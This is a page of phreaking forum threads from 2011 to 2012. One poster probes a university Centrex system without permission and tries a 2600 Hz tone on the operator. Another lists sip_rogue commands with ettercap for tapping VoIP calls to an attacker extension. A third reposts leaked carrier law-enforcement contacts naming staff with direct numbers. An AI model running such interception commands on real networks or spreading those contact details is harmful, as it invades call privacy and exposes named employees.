Old Skool Phreaking

Wiretap Instructions (for the United States)

Fri, 03 Feb 2012 23:43:38 +0000

http://cryptome.org/2012/01/0081.pdf

very interesting

u pitt's centrex

Fri, 20 Jan 2012 20:32:49 +0000

I'm a student at pitt and have a few questions about their Centrex system that I've been poking around a bit with lately. Any documentation on such systems would be really great, I am really clueless about centrexes in general, I don't even know who made them, if they're like hosted off a switch or something, etc. The telephones in the dorms are avaya but i doubt that relates at all to the system itself; they could be any standard DTMF phone. All I know is that the centrex was installed in 1973 and it seems like very little has changed since then.

When you pick up the phone, there's no big kerplunk of what I believe to be the battery drop on a 5ESS or anything, just dialtone, but you can tell its not a digital one. The system accepts no pulse dialing at all , although if you flash on the dialtone you do get a very pronounced battery drop (I might be using this term incorrectly), and the flash itself is kind of interesting. I drew a little diagramy thing to demonstrate this one thing that happens:

normal dialone -> you hit flash -> get a burst of the same dialtone as before -> batt drop (or at least loud chk-CHK!) -> new dialtone

If you hit a digit during the "get a burst of the same dialtone as before) segment, during the new dialtone phase, the centrex will have already responded to it (so if you hit zero during the "old burst", you won't even get a dialtone during the "new dialtone" phase, just a ring to the operator). I realize this is a pretty insignificant phenomena but hey, it's 2012, and you should be damn happy there's even a soul posting here. Hopefully this could help identify the system.

Dialing plan. Here's where the most of my exploration has been so far.
I haven't mapped the entire basic dialing plan, but it's 9 to get a dialtone that will lead you to the outside, 0 for operator, * and # codes are accepted and screwy, like everything on here. I haven't done all of * yet but I have poked around #, which is listed below. Keep in mind that this portion of the dialing plan I explored from a public university phone here, and the system most certainly does distinguish between dorm and public phones. Hopefully I'll look more into this later.
#1 and #6 just give you dialtones, with their own screwy dialing plans as well. No idea.
# 2 and #3 give you a slow, triple stutter of dialtone to silence (meaning this is not a stutter dialtone, just a pseudo-dialtoneish-ring). However, they just lead to a short silence, then a batt drop (?), then a long silence that you have to hang up on to get back to the normal dialtone.
Everything else is a sirenish-tone (which serves as the system's equivalent to a busy/ro, which it gives you for screwy dials like ** or something, and the such), and there are a couple of reorders in the # portion of the dialing plan too. Any idea why they distinguish between these sirenish tones and a RO?

I just called the operator and tried to blow her off with a 2600 tone, and there's a sliver of a chance it worked. She could have just hung up one me but it seemed like I got a really fast battery drop like a second after I played the tone. I don't want to test this again because it seems to be the same one lady who works as the operator and I'm ridiculously paranoid (more on that later)

The 9- portion of the dialing plan is kind of interesting too, and once again, distinguishes between dorm and public phones.
One cool trick I've found is that from the dorm phones 9-1-412-555-1212 just gets you a sirenish tone, but if you dial 9-412-555-1212-#, you actually get verizon directory assistance. Does verizon DA just look up, and not connect you to numbers always? I asked the operator there if she could read my number back to me and she said she "didn't have it," I have no idea what this implies.
The 9- portion loves to give you stutter dialtones at weird instances, I have no idea if this is some antiquated calling card shit or what. Let me explain. From a public phone, any connecting to 412-555-1212 give you a stutter dialtone and returns a sirenish after 7 digits. Also, on dorm phones and public phones dialing any 800 number and a # at the end hits you up with a stutter dialtone, which makes me believe it's waiting for a PIN of sorts to continue.

By far the most interesting thing I've found seems to be the system's test prefix in their dialing plan, which is the super secret, incredibly hard to find, 123- dialing plan. 123 hits you up with a non-stutter dialtone with its own plan of course. Dialing 1234567 here just gives you this peculiar silence with a decent amount of old sounding backround quiet rhythmic clickish white noise.

and then there's 123-00# and 123-11#, which both give you a higher pitched sounding dialtone. I don't know if this is considered a "high tone" or not. These may be DTMF tests, but if so, I haven't found out how to work the thing. I'm famaliar with the chicagoland ringback/dtmf test which is pretty screwy in itself, but if this is indeed a dtmf test than this is way screwier. Dialing plan:

0 - a burst of silence, could be waiting for more digits if DTMF test
1,4,5,7,8,9 all give a single burst of higher-pitched (meaning higher than this subsystem's dialtone) tone the same silence as when you dial 123-1234567 from the starting dialtone
2 and 3 give a different flavor of silence, they have added on to them a louder sort of hum that seems to indicate more voltage is running through them. Possibly they're waiting for more digits but I havne't been able to find any.
*#x (except for *#0) give you two bursts of a high pitched tone followed by silence. From here you can reset to the normal high pitched dialtone of this subsystem with # (which, in other places in this subsystem, always returns you to the high pitched dialtone). *#0 just waits for something more (FUCK YOU system, why are you so confusing???)
Both different flavors of silence will respond no further no matter how many digits you put in, unless they're waiting for a specific code I haven't figured out yet.
I've tried flashing all over this and nothing happens, it doesn't seem to be have ringback capabilities.

The ANI outgoing calls on public phones give out is 412-383-6265, which is just "a nonworking number at the university of pittsburgh."

Also dunno if I mentioned this but three way calling is supported.

There's still a ton of poking around for me to do, but it so far has proved really interesting and I'm just so excited to find something as little as this in 2012. I would love to do some recording soon but I left my induction coil and recorder at home, but it'll be up by after spring break at the latest.

If you actually read all this, sorry for the often shitty wording.

The other issue I wanted to bring up with you guys is the possiblity of getting caught. If I got in even the slightest trouble with the university that my parents were notified I would be up shit creek in a second - It's fairly questionable that I should be in college in the first place with my past semester's grades and my parents would say this exact phrase in angry disbeleif: "YOU MEAN YOU'RE STILL DOING THAT PHONELOSERS STUFF?" (yes, my mom saw me on phonelosers once in middle school and freaked (phreaked) out, and still uses this term to describe phone phreaking today). Does this system have a method of raising flags and other security measuers? Practically speaking, do you think I'll get in any trouble?

Lastly, if you're ever near campus and want to play with their centrex, you can do so by just walking into the Hillm4n Library, go through the doors on the ground floor marked exit and immediately take a left into what used to be a payphone bank, there's a nice and secluded public university phone to use.

Let's get some good old-skool discussion going here! thanks for reading!

Need to recover some deleted text messages off my phone.

Tue, 17 Jan 2012 18:23:29 +0000

'Sup Binrev'rs

Need some help. I have a Samsung G600 mobile/cell phone and I deleted a load of text messages off the phone a few weeks back.

The phone holds 50 texts on the sim card, and 150 in the phone. Now I need to recover these text messages for a court case. I've tried connecting the phone to my Ubuntu PC via the USB cable, and when I show hidden files, I can recover deleted pictures, but the text messages are no where to be seen.

I really need to recover these, and so am hoping some of your guys could point me in the right direction on how to get them back. I could really do with the date/time the messages where sent/received to, but beggars can't be choosers and all that.

Newbie to all this, looking around suggests I need a sim card reader, which I don't have, but will get one if it's needed.

Any ideas at all? Would really appreciate any advice.

Thank you.

Anyone know of an adapter for this phone jack?

Mon, 16 Jan 2012 01:15:13 +0000

I'm trying to figure out what number my alarm system dials. Problem is, when I run the comm test and pick up the phone, it seizes the line (presumably so a burglar can't pick up the phone and prevent it from communicating.) I figured I'd open the alarm panel and connect a splitter to that same jack, or use an extension cable to connect it to a regular jack, but the plug is wider than a normal one so I can't plug it into any other jack. I know it's a phone jack, since I've plugged a phone into that jack before and successfully called an ANAC, but the plug that's normally in there can't be plugged into a normal phone jack. Any ideas on what I can try? Any ideas on measures I can take to prevent it from seizing the line so I can listen to the DTMF tones? Or anything like *69 for outgoing calls?

http://i.imgur.com/URr8V.jpg

voip testing need help unable to intercept calls?

Fri, 13 Jan 2012 18:15:37 +0000

I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-
sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)

In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.

I hope i can be helped with. Thanks

Anyone running a conf bridge?

Sat, 07 Jan 2012 00:51:17 +0000

I need to hold a meeting between several people. Being as how one of them does not have any form of Internet access and several others would be opposed to Skype anyway, I thought a voice bridge might be the most effective solution. Is anyone here still running any conf bridges, or know of anyone offering the service for cheap/free?

Pictures of Obama and Phones

Fri, 06 Jan 2012 00:01:33 +0000

http://cryptome.org/2012-info/obama-phones/0015.htm

nuff said

edit

we should make a game out of this.

whoever identifies the most phones in that link gets one bitcoin from me.

28c3: Defending mobile phones

Thu, 29 Dec 2011 17:58:33 +0000

a must watch for anyone interested in mobile phone security

Quote

Download high quality version: http://bit.ly/t9efIP
Description: http://events.ccc.de/congress/2011/Fahrplan/events/4736.en.html

Karsten Nohl, Luca Melette: Defending mobile phones

Cell phone users face an increasing frequency and depth of privacy intruding attacks. Defense knowledge has not scaled at the same speed as attack capabilities. This talk intends to revert this imbalance.

Most severe attack vectors on mobile phones are due to an outdated technology base that lacks strong cryptographic authentication or confidentiality. Given this discrepancy between protection need and reality, a number of countermeasures were developed for networks and phones to better protect their users.

We explain the most important measures and track their deployment. Furthermore, we will release tools to measure the level of vulnerability of networks. Sharing the results of these measurements will hopefully create problem awareness and demand for more security by phone users around the world.

Are here anyone who still search for phones in hf?

Fri, 23 Dec 2011 22:48:31 +0000

Hello, i'm a radio enthusiast, as well as a phone phreak, and was wondering if anyone in this board still fires up his/her receiver searching for curious and interesting transmissions from phone links.
From time to tiem, there could be heard still in hf some phone links, but not many as were several years ago.
Of course, if there is anyone trying other bands and satellite, would be interesting to chat here.
Cheers!!!

800 number owner lookup

Sun, 11 Dec 2011 19:40:24 +0000

I remember a couple years ago that there was a number floating around that you would call and enter a toll free number and it would tell you the owner of that toll free number. Does anyone remember the number? Or any better way of finding the owner of an 800 number?

HTTP://HACKCANADA.COM GONE

Sat, 03 Dec 2011 18:50:21 +0000

For all the Canadians on this forum, i'd like to point out that http://hackcanada.com domain has expired. Theres no telling if the members of hackcanada.com will ever come back

The website has been alive for 13 years! I've already attempted to contact the members to request an archive of the site. There's no telling if I will ever get a response as my intelligence tells me that some or all of the members have left the continent to prepare for the coming apocalypse.

Let us have a moment of silence for this amazing hacking crew.

Verizon & magic jack Lawful spying guide

Fri, 25 Nov 2011 23:48:45 +0000

http://cryptome.org/isp-spy/verizon-spy.pdf

I believe there was an older one released on cryptome that I included in an older thread. This one was just leaked today:

noteworthy phonenumbers:

Quote

● Subpoenas & Search Warrants:
– (888) 667-0028
● Court Orders:
– (908) 306-7491
– (908) 306-7492
● Exigent:
– (908) 306-750

Contact Information
● Supervisor - Subpoenas & Search Warrants:
- Bernie Newman – (908) 306-7787
- Joseph Newman – (908) 306-7788
● Supervisor - Court Orders/Exigent Situations:
- Mark Denton- (908) 306 7785
- John Profaca – (908) 306 7789
● Associate Director – Law Enforcement Resource Team:
- Debra Ennis – (908) 306-7790
● Sr. Analyst – CALEA:
- Brian Marcus – (908) 306-7548
• Manager – CALEA:
- Susan Connelly – (908) 306-7786
● Director – Law Enforcement Resource Team:
-Kimberly Brown - (908) 306-7899

...

Exigent Situations
● Complete, sign and fax exigent form/letter*
● Call (800) 451-5242 prompt “4” – 24x7

...

There is also a table of contacts at the end of the document, but i cannot easily copy and paste it - you'll have to check it out for yourself.

Magic Jack:
http://cryptome.org/isp-spy/magicjack-spy.pdf

The DEA says this is their contact:

Quote

YMax Corporation
Attn: Lorraine Fancher
5700 Georgia Ave
West Palm Beach, FL 33405
561-586-3380
fax number for subpoenas is 888-762-2120
Lorraine.Fancher@ymaxcorp.com

iphone hack leaks

Fri, 25 Nov 2011 23:40:41 +0000

Apple iPhone Passcode Work-Around

http://cryptome.org/isp-spy/iphone-spy5.pdf

Quote

If you encounter an Apple iPhone where the phone is locked with a Passcode, keep in mind the
hand set only allows 5 Passcode attempts before locking out phone.

This work-around is limited to iPhones with firmware versions 1.1.2 and earlier. The workaround was disabled on version 1.1.3 in February 2008.

iPhone/iPod Touch Forensics Manual
http://cryptome.org/isp-spy/iphone-spy4.pdf

Processing iPhones
http://cryptome.org/isp-spy/iphone-spy3.pdf

iPhone Call History
http://cryptome.org/isp-spy/iphone-spy2.pdf

there are others in the series as well, but those are the new ones

cell phone jammer can be a necessity in our lives

Fri, 11 Nov 2011 09:26:50 +0000

Quote

NOTE from StankDawg: The original post was removed as SPAM. The context of this reply and thread is in response to a cell phone jammer. I am leaving the thread for the sake of discussion but give context to the posts.

this is totally illegal device, however, this device looks legit (not sure about the supplier tho). 3 watts is a lot of output.

Smartphones and the Coming Security Risk

Tue, 08 Nov 2011 04:00:47 +0000

Hi all,

Recently I was watching an article on the a current affairs in Australia here and they were talking about the fact there's a chip in your phone that is the same as the one you have on your credit cards. This chip will be used to have your phone as the credit card instead giving you the ability to use your phone with particular Eftpos machines at stores.

The problem I see with it is people have the ability to steal your credit card information by making card readers which they hide over ATM machines. This in a way makes it easier for black hat hackers in that they maybe able to intercept the signal from your phone to the eftpos machine and then decrypt it giving them your card details.

But it maybe even easier then intercepting the message from the phone to the eftpos machine with the amount people are now using the internet on there phones along with trusting anything that is in the Google market place etc. Giving an easy doorway into your phone and your details.

Things are becoming easier to do with technology so we only have to have one item on us but its opening up an easy way to steal all of your information.

Anyway thoughts on this?

Powermaniac